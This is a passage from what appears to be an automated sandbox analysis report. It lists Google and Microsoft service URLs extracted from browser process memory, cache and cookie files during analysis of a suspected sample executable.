Source: chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000007.00000002.2028111286.000051E00304C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025011095.000051E0029BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024934993.000051E0029A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2023043213.000051E0026D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000007.00000002.2028111286.000051E00304C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025011095.000051E0029BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024934993.000051E0029A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2023043213.000051E0026D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000007.00000003.1935686644.00002AA000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025977188.000051E002BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000007.00000002.2017083998.00002AA000238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1973717400.000051E003EF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025011095.000051E0029BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000007.00000003.1976197405.00002AA000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1935537468.00002AA00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1935686644.00002AA000728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000007.00000003.1974848256.000051E003EF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardQ
Source: chrome.exe, 00000007.00000003.1976197405.00002AA000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1935537468.00002AA00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1935686644.00002AA000728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000007.00000002.2018042192.00002AA000904000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 00000007.00000003.1935686644.00002AA000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025977188.000051E002BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000007.00000002.2022816639.000051E002678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1971305344.000051E003D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1972346702.000051E003D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1971948126.000051E0034C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 00000007.00000003.1958809149.000051E00340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1958733292.000051E003378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1958345065.000051E0025B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000007.00000003.1958809149.000051E00340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1958733292.000051E003378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1958345065.000051E0025B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000007.00000003.1936201336.00002AA000880000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2018104440.00002AA000920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1958345065.000051E0025B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000007.00000003.1935686644.00002AA000728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000007.00000002.2018104440.00002AA000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918P
Source: chrome.exe, 00000007.00000002.2018104440.00002AA000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plusp?
Source: chrome.exe, 00000007.00000002.2018014652.00002AA0008D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: chrome.exe, 00000007.00000003.1938609769.000051E0023CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2020934104.000051E0023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/
Source: chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/&
Source: chrome.exe, 00000007.00000002.2029511531.000051E0034B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000007.00000002.2022816639.000051E002678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1971305344.000051E003D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1972346702.000051E003D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1971948126.000051E0034C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: chrome.exe, 00000007.00000002.2029511531.000051E0034B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027033597.000051E002E14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2030264279.000051E00380C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000007.00000002.2029511531.000051E0034B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000007.00000002.2029283647.000051E003340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029511531.000051E0034B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024934993.000051E0029A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2030264279.000051E00380C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2020050558.000051E0022EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/n
Source: msedge.exe, 0000000B.00000002.2179100145.00007348003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.cn/
Source: msedge.exe, 0000000B.00000002.2179100145.00007348003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.com/
Source: Cookies.14.dr	String found in binary or memory: https://msn.comXID/
Source: Cookies.14.dr	String found in binary or memory: https://msn.comXIDv10
Source: chrome.exe, 00000007.00000002.2023188496.000051E002700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2028984895.000051E003248000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024514018.000051E002920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000007.00000002.2023281820.000051E002718000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025607825.000051E002B21000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024514018.000051E002920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000007.00000002.2024514018.000051E002920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyf
Source: chrome.exe, 00000007.00000002.2027922661.000051E002FE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2022699641.000051E00260C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024514018.000051E002920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000007.00000002.2027922661.000051E002FE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhoneaf
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: chrome.exe, 00000007.00000003.1978963138.000051E003B3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
Source: chrome.exe, 00000007.00000002.2028706870.000051E0031A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000007.00000002.2025755406.000051E002B60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1946783369.000051E0031BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: QuotaManager.12.dr	String found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
Source: chrome.exe, 00000007.00000002.2020934104.000051E0023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: msedge.exe, 0000000B.00000002.2179100145.00007348003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://office.net/
Source: chrome.exe, 00000007.00000003.1971772953.000051E003CD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000007.00000003.1973385710.000051E0024A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000007.00000003.1971772953.000051E003CD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000007.00000003.1971772953.000051E003CD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000007.00000003.1946463268.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2026883825.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1942724192.000051E002978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029643045.000051E00354C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027175458.000051E002EA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027238651.000051E002EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1942675553.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000007.00000003.1946463268.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2026883825.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029643045.000051E00354C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027175458.000051E002EA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1942675553.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000007.00000003.1946463268.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2026883825.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1942724192.000051E002978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029643045.000051E00354C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027238651.000051E002EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1942675553.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000007.00000003.1946463268.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2026320504.000051E002CA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2026883825.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029643045.000051E00354C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027175458.000051E002EA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1942675553.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000007.00000002.2021906339.000051E0024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1946463268.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2026883825.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1942724192.000051E002978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029643045.000051E00354C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027175458.000051E002EA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027238651.000051E002EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1942675553.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000007.00000003.1946463268.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2026883825.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029643045.000051E00354C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027175458.000051E002EA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1942675553.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000007.00000003.1946463268.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2026320504.000051E002CA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2026883825.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027773496.000051E002FB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1942724192.000051E002978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029643045.000051E00354C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027175458.000051E002EA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027238651.000051E002EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1942675553.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000007.00000003.1946463268.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2026883825.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1942724192.000051E002978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029643045.000051E00354C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027238651.000051E002EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1942675553.000051E002DD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000007.00000002.2023043213.000051E0026D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: msedge.exe, 0000000B.00000003.2063614914.0000734800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/AddSession
Source: msedge.exe, 0000000B.00000003.2063614914.0000734800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/Logout
Source: msedge.exe, 0000000B.00000003.2063614914.0000734800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
Source: msedge.exe, 0000000B.00000003.2063614914.0000734800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/MergeSession
Source: msedge.exe, 0000000B.00000003.2063614914.0000734800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/OAuthLogin
Source: msedge.exe, 0000000B.00000003.2063614914.0000734800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
Source: msedge.exe, 0000000B.00000003.2063614914.0000734800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
Source: msedge.exe, 0000000B.00000003.2063614914.0000734800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
Source: msedge.exe, 0000000B.00000003.2063614914.0000734800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
Source: msedge.exe, 0000000B.00000003.2063614914.0000734800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
Source: msedge.exe, 0000000B.00000003.2063614914.0000734800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
Source: msedge.exe, 0000000B.00000003.2063614914.0000734800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfoPortable
Source: msedge.exe, 0000000B.00000003.2063614914.0000734800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
Source: msedge.exe, 0000000B.00000003.2063614914.0000734800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v4/tokenHs
Source: msedge.exe, 0000000B.00000003.2063614914.0000734800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
Source: msedge.exe, 0000000B.00000003.2063614914.0000734800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
Source: chrome.exe, 00000007.00000002.2025755406.000051E002B60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1946783369.000051E0031BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000007.00000003.1958809149.000051E00340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1958733292.000051E003378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1958345065.000051E0025B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 00000007.00000002.2029246001.000051E003330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2030264279.000051E00380C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2026734252.000051E002D6C000.00000004.00000800.00020000.00000000.sdmp, chromecache_434.9.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chrome.exe, 00000007.00000002.2026734252.000051E002D6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/log?format=json&hasfast=trueQ
Source: chrome.exe, 00000007.00000002.2030264279.000051E00380C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/log?format=json&hasfast=trueQator5
Source: chromecache_437.9.dr	String found in binary or memory: https://plus.google.com
Source: chromecache_437.9.dr	String found in binary or memory: https://plus.googleapis.com
Source: chrome.exe, 00000007.00000002.2025755406.000051E002B60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1946783369.000051E0031BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: dwpk5JGAxF.exe	String found in binary or memory: https://protobuf.dev/reference/go/faq#namespace-conflictin
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000007.00000002.2019357752.000051E002278000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000007.00000002.2019982777.000051E0022B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000007.00000002.2020934104.000051E0023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comb
Source: chrome.exe, 00000007.00000002.2028111286.000051E00304C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025011095.000051E0029BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024934993.000051E0029A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2023043213.000051E0026D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000007.00000002.2028111286.000051E00304C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025011095.000051E0029BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024934993.000051E0029A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2023043213.000051E0026D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000007.00000003.1959579225.000051E0024A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000007.00000002.2022816639.000051E002678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1971305344.000051E003D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1972346702.000051E003D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1971948126.000051E0034C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
